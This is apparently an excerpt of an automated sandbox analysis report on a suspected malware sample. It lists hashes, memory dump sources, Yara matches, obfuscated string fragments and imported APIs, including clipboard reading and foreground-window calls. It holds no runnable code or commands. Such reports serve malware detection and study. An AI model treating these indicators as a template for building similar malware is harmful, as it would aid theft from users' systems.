                                  • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                  • Instruction Fuzzy Hash: A0D149B664C7588BC324CF24C8516BBBBE6EBC1304F1D896DE5D98B341D639C906CB82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                  • API String ID: 0-2463461626
                                  • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                  • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                  • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                  • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                  • API String ID: 0-2986092683
                                  • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                  • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
                                  • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                  • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                  • String ID:
                                  • API String ID: 1006321803-0
                                  • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                  • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                  • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                  • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                  • API String ID: 0-2309992716
                                  • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                  • Instruction ID: 4b18cb0396a9cf7f02246c574f02ad8c10516d1cfbfb0ef65e7804b83c771304
                                  • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                  • Instruction Fuzzy Hash: 7961046164C3CA8AD3118F3988A077AFFE49FA3314F18496DE5D14B392D369CA0A9716
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                  • API String ID: 0-2309992716
                                  • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                  • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                  • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                  • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #4<7$+8=>$PK$Tiec$\$r
                                  • API String ID: 0-1906979145
                                  • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                  • Instruction ID: 127b0e0f16611a9720c297e673dae8b9a9251b89f54836bc99ac3c61eb10bf8d
                                  • Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                  • Instruction Fuzzy Hash: 4ED13476A0C3448BD718CF35C8916ABBBE6EFD1318F18892DE5E68B251D738C905CB46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #4<7$+8=>$PK$Tiec$\$r
                                  • API String ID: 0-1906979145
                                  • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                  • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                  • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                  • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 009F8B83
                                  • GetCurrentThreadId.KERNEL32 ref: 009F8B8C
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009F8C42
                                  • GetForegroundWindow.USER32 ref: 009F8C9A
                                    • Part of subcall function 009FC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 009FC7CA
                                    • Part of subcall function 009FB5F7: FreeLibrary.KERNEL32(009F8D1F), ref: 009FB5FD
                                    • Part of subcall function 009FB5F7: FreeLibrary.KERNEL32 ref: 009FB61E
                                  • ExitProcess.KERNEL32 ref: 009F8D38
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                  • String ID:
                                  • API String ID: 3072701918-0
                                  • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                  • Instruction ID: ed15f4363e6c4fdc0a1c467bd948c54755c74bdbc3b496420d39b5be6f9f7351
                                  • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                  • Instruction Fuzzy Hash: C25186BBF102180BD71CAEB9CC5A7AA758B8BC5710F1E813D5A45DB3D5EDB8880183D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: )G+I$+K M$B~B$|B$s0u
                                  • API String ID: 0-2670551875
                                  • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                  • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                  • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                  • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: KT$Q$SV$p8`;$xy
                                  • API String ID: 0-2575762000
                                  • Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                  • Instruction ID: 687f26b5cba9b7f11b76b7e83b129ada14463896197a0398f5d6df1981a7ae16
                                  • Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                  • Instruction Fuzzy Hash: BF910EB6A1C3549FD304DF56C84155FBBE2BFD5300F09896DE8C88B241EA36CA09CB86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$-+$/$hI
                                  • API String ID: 0-2772680581
                                  • Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                  • Instruction ID: 3d94f3c134d07a45b9e0d7b18c581d3e299893ebe1f4d29153a0c70978a03c4d
                                  • Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
                                  • Instruction Fuzzy Hash: B942377150C3858FD721CF24D840A6EBBE1AF92314F188A6CE8E95B3D2D736D906DB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$-+$/$hI
                                  • API String ID: 0-2772680581
                                  • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                  • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                  • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                  • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0u4w$_q$qr$xy
                                  • API String ID: 0-1225007230
                                  • Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                  • Instruction ID: 21291dfe80229e30d8b6ef77d9a4807e21529ee0511f13f41a3d7ecdab8554ca
                                  • Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
                                  • Instruction Fuzzy Hash: FF9111B2A083148BC714CF98D89276BB7F1EFD5324F18992CE8CA8B391E3749905C756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                  • Instruction ID: 7b7116709a60a01408ce7eee87425b4896f314d092170391b7ef58685559d63b
                                  • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                  • Instruction Fuzzy Hash: DF917A71A0C3D08BE3348B3984517EBBBD29FE3314F19896DC4CA9B382CA754845CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                  • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                  • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                  • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                  • Instruction ID: 79e4c1232a3c00efa283d91b665c86a28cfa1c63a865a7862f7ae1840accd331
                                  • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                  • Instruction Fuzzy Hash: 32916A71A4C3D08BE3348B3984517EBBBD29FE3314F18896DC4DA9B782CA754845CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                  • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                  • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                  • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                  • Instruction ID: 8dce2d608cf6ecfa2115dcd82ea364e3e42d581f6785ce280157c96fbe7a0598
                                  • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                  • Instruction Fuzzy Hash: 66916A71A0C3D08BE3348B3984517EBBBD2AFE3314F18896DD4D99B682CA754849CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                  • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                  • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                  • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                  • Instruction ID: 40495ea646422bf00e16665b2cc823a8c0ea5cc514e1a1ffd9184c26794c2496
                                  • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                  • Instruction Fuzzy Hash: 138147729083D08BE3348F3988517ABBBD2AFE3314F19896DD4C95B686C675480ACB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,JHj$Hs$bc$v
                                  • API String ID: 0-909542228
                                  • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                  • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                  • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                  • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /G$I$7N1@$Fg)i${\}
                                  • API String ID: 0-149357369
                                  • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                  • Instruction ID: 3b9546724bcb27ff94fd1c1bc674bb9f1e7a13163c978a8a217b8282cbf01401
                                  • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                  • Instruction Fuzzy Hash: 1E21B8B54193809BC314CF66884161BFBE2BBD2704F29A92CF0C85B255D3748902CF8B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: ,$i$r}A
                                  • API String ID: 2994545307-2114006112
                                  • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                  • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                  • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                  • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: gfff$i$r}A
                                  • API String ID: 0-3931832132
                                  • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                  • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                  • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                  • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <pr$st$y./
                                  • API String ID: 0-3839595785
                                  • Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                  • Instruction ID: edcd356360ae52f56419ce753c28a0de45ef7064320914f5032cebd6a69a98ea
                                  • Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                  • Instruction Fuzzy Hash: A5C14772A083114BD7289F28C852BBBB3E1EFD5350F19892DE99687381E738DD51C392
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <pr$st$y./
                                  • API String ID: 0-3839595785
                                  • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                  • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                  • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                  • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 34$C]$|F
                                  • API String ID: 0-2804560523
                                  • Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                  • Instruction ID: 0419f352b89056b25a9dc1efb591a675a9534ce13752a456387a7f4a7fe710d8
                                  • Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
                                  • Instruction Fuzzy Hash: FDC130B29083558BC720CF68C88166BB7F2FFD5314F18895CE8D58B390E775A905CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 34$C]$|F
                                  • API String ID: 0-2804560523
                                  • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                  • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                  • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                  • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #XXL$=$BC
                                  • API String ID: 0-2546488661
                                  • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                  • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                  • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                  • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 12347$oQ3$sQ3
                                  • API String ID: 0-1755585375
                                  • Opcode ID: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                  • Instruction ID: 299f0707ee06b432af5e49eefa83f2f209e063135e074ecef0231e7d0e86467e
                                  • Opcode Fuzzy Hash: d6219592765054223d8b44a29d17a2c15be9e83531692649a6c6d0283300f812
                                  • Instruction Fuzzy Hash: B2B14432A083658FC728CF28D89096BB7F2EBD5314F1A893CE99697755D731AD01C782
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: 1234$oQ3$sQ3
                                  • API String ID: 2994545307-3057079318
